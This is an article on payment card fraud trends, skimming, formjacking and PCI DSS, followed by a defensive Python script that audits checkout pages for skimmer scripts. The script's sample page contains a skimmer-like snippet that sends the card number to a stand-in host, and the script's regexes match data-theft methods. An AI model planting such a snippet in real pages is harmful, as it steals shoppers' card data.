Payment cards make purchasing convenient not only for consumers and businesses, but for fraudsters, too. Global fraud losses from payment cards in 2018 reached $27.85 billion, according to the latest numbers from The Nilson Report, a card and mobile payments trade publication. As large as those losses are, they only amount to $10.83 for every $100 of spending by credit card users, which is actually lower than the previous year, $11.12 per $100.
That may be why credit card issuers believe they have fraud under control. “What worries most credit card sponsors more than fraud is unfairly blocking a consumer’s legitimate transaction,” says Roger Grimes, a defense evangelist at KnowBe4, a security awareness training provider. “Most of the evolving and newer systems aren’t trying to detect credit card fraud better. What they are trying to do better is prevent losing customers from blocking legitimate transactions. So, shockingly, most of the activity is in preventing ‘false-positives’ and not in actually decreasing real fraud.”
Fraud has a limited immediate impact on consumers and businesses. If a number is compromised and a thief goes on a spending spree, liability is limited to $50.
Consumers and businesses might see fraud costs down the road in the form of increased prices for goods and services as merchants and credit card issuers pass on the cost of losses. “Ultimately, some amount of fraud will always exist for as long as we continue to use credit cards,” observes Paul Bischoff, a privacy advocate at Comparitech.com, an information website for consumer security products. “A large part of the interest payments we all make on credit cards goes toward compensating for fraud.”
Credit card fraud scope and trends
Card issuers have boosted the security of their physical cards through the use of EMV PIN and chip technology. “EMV was a big leap forward,” says Greg Hancell, senior manager at OneSpan, a provider of anti-fraud and digital transaction management solutions. “In countries that adopted the technology, card-present fraud disappeared overnight. The problem was it went online, and card-not-present fraud increased.”
A study released by the Federal Reserve in 2018 noted that a year after EMV cards began to be issued in the United States, card-present fraud—fraud where a physical credit card was used for the fraudulent transaction—dropped to $2.91 billion in 2016 from $3.68 billion in 2015. Meanwhile, during the same period, card-not-present fraud—fraud where a credit card number is used over the phone or in an online transaction—jumped to $4.57 billion from $3.4 billion. Online fraud has continued to grow until now card-not-present fraud is 81% more likely to occur than card-present fraud, according to Javelin Strategy & Research.
However, the adoption of EMV technology hasn’t been consistent globally, which has opened the door for some global bandits. Organized crime groups can plant radio-enabled skimmers—a hardware device for capturing credit card information without a user’s knowledge—in ATMs or point-of-sale terminals in a country supporting EMV and send data from those skimmers to accomplices in a country without EMV support. “They can take that information and print a card in under a minute. Then they will use that card without worrying about EMV,” Hancell said.
He adds that card-not-present attacks might become broader threats because they can be scaled up with automation. “With a skimmer on a single machine, you run the risk of only a few people visiting the machine, or the skimmer being quickly discovered,” Hancell explains. “In the card-not-present world, you can send out a phishing attack to a target range of victims that will encourage them to provide you with credit card details or will infect them with malware and steal their details that way.”
Uri Arad, co-founder and vice president of product at Identiq, operator of a peer-to-peer user identification network, added that professional fraudsters often prefer to work at scale. “They want to maximize their ROI and may well use botnets to attack as many sites as quickly as possible, as well as programs to automatically rifle through new identities and matching IPs quickly and easily for each new attack,” he says.
As fraud detection systems get more sophisticated, online swindlers are going to greater lengths to obscure their activity. “They will try to mask their IPs using proxies of various kinds,” Arad says.
“More sophisticated fraudsters will even aim for IPs in close proximity to the billing address of the stolen card they plan to use,” Arad continues. “Similarly, they may use emulators to appear to be coming from a mobile device, change the time on their computer to match the relevant time zone, or use virtual machines or wiped or jailbroken devices to appear to come from a clean machine.”
Credit card fraud has become such a large enterprise and is so sophisticated that it has begun to take on the characteristics of legitimate businesses. For example, a clear division of labor has developed. “What we have seen via many of the recent data-breaches for the last few years is a large, organized and coordinated series of hand-offs between malware creators to those who breach the payment systems to those that package and sell the breached credit card information,” says Bryan Jardine, director of product management at AppGate, a developer and provider of security and analytics products and services.
Jardine adds that digital wallets have also been targeted by credit card thieves. “Stolen credit card information sold on the black markets is used to load balances into these non-deposit accounts,” he explains. “Then the balances are transferred to another individual in peer-to-peer payments, who buys gift cards or pre-paid cards that cannot be tied to an individual when used. These payment style cards can then be used with complete anonymity online.”
The Russian-speaking underground was a leader in credit card theft in the early 2000s and continues to be at the forefront of fraud, building a cybercrime-as-a-service model. “They have created end-to-end services for experienced to novice cybercriminals that have expedited the evolution of exploitation techniques,” says Ed Cabrera, chief cybersecurity officer at Trend Micro, a maker of enterprise cybersecurity solutions.
Purchasing habits of fraudsters have changed over the years, too. They’re shying away from physical goods, which can be difficult to convert into cash and easy to track by law enforcement. “Usually they purchase intangible things that are more difficult to trace, such as gift cards, crypto currencies, and digital goods. They might also try to reap the rewards from a card’s points program,” Comparitech’s Bischoff says.
Credit card thieves, though, may be victims of their own success. “Evidence suggests that there is an oversupply of stolen credit cards and not enough demand from criminals who want to use them,” Bischoff says. “This has driven the price of stolen credit cards on the dark web down to just a few dollars each.”
Types of payment card fraud
If a malicious actor obtains credentials to an account, they can purchase items through any payment cards tied to that account. They can also check out the profile of the account holder, copy any credit information stored there, and use it to buy stuff outside the account. For example, if someone compromises an Amazon account, they can buy goods with any form of payment associated with the account and add an address where the items should be shipped.
Credentials used to compromise accounts can be obtained in several ways: purchased on the dark web or captured by deception. “A person gets an email or text alert that something’s wrong with their account. They follow a link and are sent to a fake site to log in with their credentials, which the attackers then use to own the account,” says Deb Radcliff, an evangelist at Bolster Security, a maker of an online fraud prevention solution.
Skimmers and shimmers
Skimmers capture payment card information on a card’s magnetic strip. Shimmers snatch data from EMV cards. These are usually hardware devices placed on ATM or point-of-purchase terminals designed to steal information used to complete a legitimate transaction. Since planting hardware can be labor intensive, fraudsters often take the malware route and infect point of sale (POS) systems that way.
Software-based skimming has become a popular form of online fraud largely due to Magecart, which consists of at least seven criminal groups that have infected shopping carts at thousands of e-commerce sites with skimming malware. Among the gang’s high visibility targets have been Ticketmaster, British Airways, and Newegg.
“Formjacking is one of the most used techniques,” says Mounir Hahad, head of the threat lab for Juniper Networks, a network security and performance company. “A malicious script is injected into the payment page of a compromised merchant’s site, siphons off credit card information entered by unsuspecting shoppers, and sends it to the attackers.”
Flaws in software can be exploited to steal all kinds of information from devices, including credit card data. For example, Magecart attacks exploit a bug in MAGMI, a plug-in for Magento-based online stores, to plant malicious code at a site that leads to the theft of payment information.
It seems that no matter how often users are warned about clicking on links in emails, they continue to do so. Clicking on such links usually leads to a malicious website that tries to pry credit card data from a visitor or plant malware on their computer. “Malware can range from a simple keylogger that steals all text to a more complex style that specifically looks and parses out credit card and related data,” says Melody J. Kaufman, a cybersecurity specialist with Saviynt, an application and infrastructure security provider.
Unscrupulous employees at financial institutions, credit card manufacturers, restaurants, retailers or just about anyone who handles credit cards can engage in fraud.
Organizations that handle credit cards from the major providers must comply with the Payment Card Industry Data Security Standard (PCI DSS). Merchants, ISVs and anyone who stores, processes, transmits or otherwise manipulates cardholder data, as well as service providers who can affect the security of cardholder data, must meet the requirements of PCI DSS, including:
- Install and maintain a firewall configuration to protect cardholder data.
- Do not use vendor-supplied defaults for system passwords and other security parameters.
- Protect stored cardholder data.
- Encrypt transmission of cardholder data across open, public networks.
- Use and regularly update anti-virus software or programs.
- Develop and maintain secure systems and applications.
- Restrict access to cardholder data by business need to know.
- Assign a unique ID to each person with computer access.
- Restrict physical access to cardholder data.
- Track and monitor all access to network resources and cardholder data.
- Regularly test security systems and processes.
- Maintain a policy that addresses information security for all personnel.
“The PCI has done a lot to help organizations secure their own credit card transactions and storage of card data through mandated controls, penetration tests and yearly audits,” Saviynt’s Kaufman says.
“While this does not limit fraudulent transactions,” she continued, “it does make it harder to compromise a card processor and walk away with thousands of cards, which does limit the potential for fraud.”
Industry groups have begun to explore deeper forms of collaboration to address their fraud problems. “Many of these projects have been stymied by the problem of data sharing, but new providerless options have started to emerge to enable collaboration on a data level without actually sharing any personal user data at all,” Identiq’s Arad says. “The more closely companies and industry organizations can work together, the more effectively they can combat fraudsters, so it will be very interesting to see how this develops.”
Mitigating credit card fraud
These are some of the recognized best practices for preventing payment card fraud:
- Encrypt databases that hold credit card data.
- Put recurring checks in place for ecommerce server communications with known command-and-control servers used by skimmers.
- Regularly scan your ecommerce sites for vulnerabilities and malware.
- Vet third-party code loaded by partners and content delivery networks for malware.
- Keep shopping cart software and other services up-to-date and patched.
- Use strong administrative passwords and limit access to the administrative portal for ecommerce websites.
- Monitor the dark web for stolen card data.
- Use anomaly detection software to identify and flag suspicious activity.
- Encourage customers to opt for multi-factor authentication, especially for changes to personal and payment information.
- Educate customers about how to identify signs that their payment cards have been compromised. Make it easy for them to report suspicious activity.
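A way to put two of these practices into a recurring check, and to catch the formjacking pattern described earlier (a script on the payment page that reads card fields and posts them elsewhere), is to audit the checkout page’s script tags against an allowlist of the merchant’s own hosts. The example below is added here and is not code from the article or any vendor quoted in it; the hostnames, the sample page and the indicator patterns are constructed assumptions.

```python
"""Audit a checkout page for web-skimming (formjacking) indicators.

Flags <script src> tags served from origins outside the merchant's allowlist,
and inline scripts that both touch payment form fields and send data out.
Standard library only, so it can run offline over a saved copy of the page.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Assumption: hosts the merchant knowingly loads scripts from.
ALLOWED_ORIGINS = {"shop.example", "cdn.shop.example"}
# Indicators: a reference to card fields plus a way to ship data off-page.
FIELD_RE = re.compile(r"(card|cvv|cvc|expir)", re.I)
EXFIL_RE = re.compile(r"(XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=)")


class ScriptAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []      # list of (kind, detail) tuples
        self._inline = None     # buffer for the inline script being read

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            host = urlparse(src).hostname or ""   # relative URLs stay same-origin
            if host and host not in ALLOWED_ORIGINS:
                self.findings.append(("external-script", host))
        else:
            self._inline = []

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            body = "".join(self._inline)
            if FIELD_RE.search(body) and EXFIL_RE.search(body):
                self.findings.append(("inline-exfil", body.strip()[:60]))
            self._inline = None


def audit(html):
    """Return the list of findings for one page's HTML."""
    parser = ScriptAuditor()
    parser.feed(html)
    return parser.findings


# Constructed sample: one legitimate script, one unknown host, one skimmer-like inline script.
SAMPLE_PAGE = """<form id="checkout"><input name="cardNumber"><input name="cvv"></form>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="//static-analytics.example/t.js"></script>
<script>document.querySelector('#checkout').addEventListener('submit', function () {
  var pan = document.querySelector('[name=cardNumber]').value;
  fetch('https://collect.example/p', {method: 'POST', body: pan});
});</script>"""

if __name__ == "__main__":
    for kind, detail in audit(SAMPLE_PAGE):
        print(kind, detail)
```

Run it on a daily crawl of the live checkout page and alert on any new finding; a script host appearing for the first time is exactly the signal the "vet third-party code" practice above is asking for.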